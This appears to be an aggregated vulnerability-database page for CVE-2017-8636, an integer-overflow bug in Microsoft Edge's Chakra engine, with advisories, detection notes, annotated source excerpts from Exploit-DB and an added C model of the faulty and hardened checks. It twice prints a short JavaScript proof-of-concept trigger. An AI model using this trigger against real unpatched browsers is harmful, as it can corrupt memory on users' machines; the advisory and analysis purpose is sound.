CVE-2017-8636
Published 2017-08-08
Priority: P2 (72, high)
CVSS 3.0: 7.5 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
Exploit: public (see Exploit-DB entries below)
EPSS: 72.12% (99.4th percentile)
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft_corporation | microsoft_scripting_engine | — | — |
| msrc | internet_explorer_10 | — | — |
| msrc | internet_explorer_11 | — | — |
| msrc | internet_explorer_9 | — | — |
| msrc | microsoft_edge | — | — |
Detection & IOCs (extracted from sources)
PoC command:
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
- CVE-2017-8636 is an integer overflow in the Chakra bytecode emitter's EmitNew function: argCount is a 16-bit Js::ArgSlot, so incrementing 0xFFFF to include "this" wraps it to 0, the OutOfMemory guard never fires, and the out-argument space and InterpreterStackFrame are sized from the wrapped count, giving a stack or heap buffer overflow.
- PoC trigger pattern: a JavaScript call or new expression with exactly 0x10000 (65536) arguments wraps the 16-bit argCount to 0 and bypasses the bounds check. Monitor for eval() calls that build very large argument lists.
- The crash manifests in chakra.dll at Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix as an access violation (code c0000005) on a write instruction; monitor for MicrosoftEdgeCP.exe second-chance access violations in chakra.dll.
- The overflow can push the InterpreterStackFrame allocation onto the heap (varAllocCount > InterpreterStackFrame::LocalsThreshold), turning the stack overflow into a heap buffer overflow; the attacker controls the allocation size through the argument count.
- A secondary NULL pointer dereference path exists: when spreadArgCount wraps to 0, spreadIndices is never initialized, and the later access spreadIndices->elements[spreadIndex++] in EmitArgs dereferences a null pointer.
- The root overflow is the increment of pnode->sxCall.argCount: with argCount == 0xFFFF, argCount++ wraps to 0, and the guard 'if (argCount != (Js::ArgSlot)argCount)' can never fire because both sides already have the same 16-bit type.
- Exploitation requires convincing a user to open a specially crafted website in Microsoft Edge or Internet Explorer, or embedding a malicious ActiveX control in an Office document or application that hosts the scripting engine.
- Microsoft rates exploitation 'More Likely' for both the latest and older software releases; its advisory states the vulnerability had not been publicly exploited at the time of publication.
CVSS provenance
nvd v3.0: 7.5 HIGH (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
nvd v2.0: 7.6 HIGH (AV:N/AC:H/Au:N/C:C/I:C/A:C)
vendor_msrc: 4.2 MEDIUM
GHSA
GHSA-g8p9-4pfp-r8v4 · CVE-2017-8655 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-jw33-q8g2-4wfm · CVE-2017-8670 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-mhjh-m6x5-jvw5 · CVE-2017-8674 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, and CVE-2017-8672.
GHSA
GHSA-9q4w-xv93-m563 · CVE-2017-8672 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, and CVE-2017-8674.
GHSA
GHSA-6hf6-hm5c-w8wg · CVE-2017-8639 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-x77g-74w8-hg5v · CVE-2017-8647 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-w885-jw3g-7qf8 · CVE-2017-8641 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-fpwp-r2g2-q9mp · CVE-2017-8640 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-pq46-h8gg-4pjh · CVE-2017-8671 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-xqp7-4r9c-vqq2 · CVE-2017-8656 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-pfrv-7vc2-g369 · CVE-2017-8645 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-5h64-f677-76hx · CVE-2017-8646 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-6q9p-g6mq-pjc8 · CVE-2017-8638 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-x64p-468c-m65v · CVE-2017-8657 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-17 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-4f64-6gfv-xcjj · CVE-2017-8634 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-14 · CVSS 7.5
Microsoft Edge in Microsoft Windows 10 1703 allows an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-xvj3-97mf-29q5 · CVE-2017-8636 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-14 · CVSS 7.5
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render content when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
GHSA
GHSA-9424-w7q3-6p43 · CVE-2017-8635 [HIGH] CWE-119 · ghsa_unreviewed · 2022-05-14 · CVSS 7.5
Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that JavaScript engines render when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8641, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.
Microsoft
Scripting Engine Memory Corruption Vulnerability · CVE-2017-8636 [HIGH] · vendor_msrc · 2017-08-08 · CVSS 4.2
Description: A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.
In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that acc
No detection rules found.
Exploit-DB
Microsoft Edge Chakra - Buffer Overflow · CVE-2017-8636 · exploitdb · 2017-08-17
---
sxCall.argCount; //pnode->sxCall.argCount=0xFFFF
argCount++; // include "this" //overflow!!!! argCount==0
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
byteCodeGenerator->StartStatement(pnode);
// Start call, allocate out param space
funcInfo->StartRecordingOutArgs(argCount);
// Assign the call target operand(s), putting them into expression temps if necessary to protect
// them from side-effects.
if (fSideEffectArgs)
{
SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);
}
if (pnode->sxCall.pnodeTarget->nop == knopSuper)
{
EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerato
Exploit-DB
Microsoft Edge Chakra - NULL Pointer Dereference · CVE-2017-8636 · exploitdb · 2017-08-17
---
**spreadIndices = nullptr)
{
// This function emits the arguments for a call.
// ArgOut's with uses immediately following defs.
EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);
Js::RegSlot evalLocation = Js::Constants::NoRegister;
//
// If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.
// This would be used while generating frameDisplay in EmitArgListEnd.
//
if (fIsEval)
{
evalLocation = funcInfo->AcquireTmpRegister();
}
if (spreadArgCount > 0) //spreadArgCount==0 because of overflow****
{
const size_t extraAlloc = spreadArgCount * sizeof(uint32);
Assert(spreadIndices != nullptr);
*spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray, spreadAr
Exploit-DB
Microsoft Edge Chakra - Heap Buffer Overflow · CVE-2017-8636 · exploitdb · 2017-08-17
---
IsCoroutine())
{
[...]
}
else
{
InterpreterStackFrame::Setup setup(function, args);
size_t varAllocCount = setup.GetAllocationVarCount();
//printf("varAllocCount: %d(%X)\r\n", varAllocCount, varAllocCount);
size_t varSizeInBytes = varAllocCount * sizeof(Var);
//
// Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
//
DWORD_PTR stackAddr;
// If the locals area exceeds a certain limit, allocate it from a private arena rather than
// this frame. The current limit is based on an old assert on the number of locals we would allow here.
if (varAllocCount > InterpreterStackFrame::LocalsThreshold) //we can make this condition satisfied so the buffer will be allocated on the heap instead of the stack!!!
{
ArenaAlloc
Exploit-DB
Microsoft Edge Chakra - 'EmitNew' Integer Overflow · CVE-2017-8636 · exploitdb · 2017-08-17
---
sxCall.argCount;
argCount++; // include "this"
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
...
}
"Js::ArgSlot" is a 16-bit unsigned integer type, and "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.
PoC:
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
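The guard quoted in the Exploit-DB write-up above, and in the IOC notes earlier on this page, fails because both sides of the comparison are already the same 16-bit type. The C program below is an added example, not Chakra's code and not part of any of the sources on this page: it keeps only the real fact that Js::ArgSlot is a 16-bit unsigned integer, and models the rest (the function names, the "parsed_arg_count" parameter, and the one-pointer-per-argument size model) as simplifications for illustration. It shows the wrap of 0xFFFF + 1 to 0 passing the original check, one way to harden the check by widening before the increment, and why the wrapped count means more argument slots are written than were reserved.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Js::ArgSlot in Chakra is a 16-bit unsigned integer. Everything else in this
 * file is a simplified model written for this page, not Chakra's own code. */
typedef uint16_t ArgSlot;

/* Model of the unfixed EmitNew logic. argCount is already an ArgSlot when the
 * guard runs, so casting it to ArgSlot again changes nothing and the guard can
 * never fire. Returns the count the emitter would go on to use, or -1 if the
 * guard rejected it (which, here, never happens). */
int vulnerable_arg_count(unsigned parsed_arg_count)
{
    ArgSlot argCount = (ArgSlot)parsed_arg_count;
    argCount++;                            /* include "this": 0xFFFF wraps to 0 */
    if (argCount != (ArgSlot)argCount)     /* same type on both sides: always false */
        return -1;
    return argCount;
}

/* Hardened model: do the arithmetic in a wider type first, then check that the
 * result survives a round trip through the narrow type. 0xFFFF + 1 = 0x10000
 * does not fit in 16 bits and is rejected before any allocation is sized. */
int hardened_arg_count(unsigned parsed_arg_count)
{
    uint32_t wide = (uint32_t)parsed_arg_count + 1u;   /* include "this" */
    if (wide != (uint32_t)(ArgSlot)wide)
        return -1;
    return (int)wide;
}

/* Consequence model: the emitter reserves out-argument slots from the (possibly
 * wrapped) count, while the call site later stores one Var per real argument
 * plus "this". Returns 1 when the stores exceed the reservation, i.e. the
 * buffer overflow the PoC triggers; 0 when the reservation is sufficient or
 * the count was rejected. */
int reservation_overflows(unsigned parsed_arg_count)
{
    int reserved = vulnerable_arg_count(parsed_arg_count);
    if (reserved < 0)
        return 0;                          /* rejected: nothing is allocated */
    size_t reserved_bytes = (size_t)reserved * sizeof(void *);
    size_t stored_bytes   = ((size_t)parsed_arg_count + 1) * sizeof(void *);
    return stored_bytes > reserved_bytes;
}

int main(void)
{
    /* 0xFFFF is the argument count the write-up describes (the PoC's 0x10000
     * element list is what produces it); the others are ordinary cases. */
    unsigned counts[] = { 3, 0xFFFE, 0xFFFF };
    for (size_t i = 0; i < sizeof counts / sizeof counts[0]; i++) {
        printf("args=0x%X vulnerable=%d hardened=%d overflows=%d\n",
               counts[i], vulnerable_arg_count(counts[i]),
               hardened_arg_count(counts[i]), reservation_overflows(counts[i]));
    }
    return 0;
}
```

The point of the widened check is that the comparison has to happen on a value that can still hold 0x10000; once the increment has been performed in the 16-bit type, no comparison against that same variable can recover the lost bit.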
Talos
Microsoft Patch Tuesday - August 2017 · blogs_talos · 2017-08-08 · CVSS 7.8 [HIGH]
Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 48 new vulnerabilities with 25 of them rated critical, 21 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Remote Desktop Protocol, Sharepoint, SQL Server, the Windows Subsystem for Linux, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.
## Vulnerabilities Rated Critical
The following vulnerabilities are rated "critical" by Microsoft:
- CVE-2017-8653 - Microsoft Browser Memory Corruption Vulnerability
- CVE-2017-8669 - Microsoft Browser Memory Corruption Vulnerability
- CVE-2017-866
References
http://www.securityfocus.com/bid/100056
http://www.securitytracker.com/id/1039094
http://www.securitytracker.com/id/1039095
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8636
https://www.exploit-db.com/exploits/42466/
https://www.exploit-db.com/exploits/42467/
https://www.exploit-db.com/exploits/42468/
https://www.exploit-db.com/exploits/42478/